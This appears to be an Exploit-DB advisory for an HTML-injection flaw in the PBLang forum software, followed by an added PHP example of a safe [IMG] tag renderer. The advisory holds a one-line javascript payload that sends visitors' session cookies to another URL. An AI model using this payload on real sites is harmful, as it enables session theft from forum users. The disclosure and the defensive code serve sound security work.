- 18 Dec 2022
- EDB-ID
- 22960
- EDB verification
- Passed
- Author
- QUAN VAN TRUONG
- Vulnerability type
- WEBAPPS
- Platform
- PHP
- CVE
- null
- Publication date
- 2003-07-28
Code:
source: https://www.securityfocus.com/bid/8286/info
PBLang is prone to an HTML injection vulnerability. An attacker may exploit this issue by including hostile HTML and script code encapsulated in PBLang tags, when posting to the bulletin board. Attacker supplied code may be rendered in the web browser of a user who views these areas of the site. This would occur in the security context of the site hosting PBLang.
[IMG]javascript:window.open("http://localhost/docs.php?docs="+escape
(document.cookie), "subwindows", "height=100,width=486")[/IMG]
- Source
- www.exploit-db.com
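
The root cause described above is that the URL inside an `[IMG]` tag reaches the `src` attribute without a scheme check. The following is an added example, not PBLang's code or its actual fix: a minimal `[IMG]` renderer in PHP that escapes the post first and only emits an `<img>` for absolute `http`/`https` URLs. The function names `safe_img_url` and `render_post` and the sample posts are assumptions made for illustration.

```php
<?php
// Added example, not PBLang code. Function names are hypothetical.

/** Return the URL if it is an absolute http(s) URL, otherwise null. */
function safe_img_url(string $raw): ?string
{
    // Reject whitespace and control characters: browsers strip some of
    // them before resolving the scheme, which defeats naive prefix checks.
    if (preg_match('/[\x00-\x20\x7f]/', $raw)) {
        return null;
    }
    $parts = parse_url($raw);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    // Allowlist of schemes; anything else (javascript:, data:, ...) is refused.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return $raw;
}

/** Convert [IMG]...[/IMG] in a post body to HTML. */
function render_post(string $body): string
{
    // Escape the whole post first so no raw markup from the user survives.
    $escaped = htmlspecialchars($body, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $html = preg_replace_callback(
        '~\[IMG\](.*?)\[/IMG\]~is',
        function (array $m): string {
            // Decode only to validate the URL exactly as the user typed it.
            $url = safe_img_url(htmlspecialchars_decode($m[1], ENT_QUOTES));
            if ($url === null) {
                return $m[0]; // leave the tag as inert, escaped text
            }
            return '<img src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '" alt="">';
        },
        $escaped
    );
    return $html ?? $escaped; // on a regex error, fall back to escaped text
}

// Constructed sample posts: one legitimate image, one with a script URL.
echo render_post('[IMG]https://example.org/a.png?x=1&y=2[/IMG]'), "\n";
echo render_post('[IMG]javascript:window.open("http://localhost/")[/IMG]'), "\n";
```

The first post renders as an `<img>` element with the ampersand escaped in `src`; the second is left as escaped literal text, so nothing executes in the reader's browser.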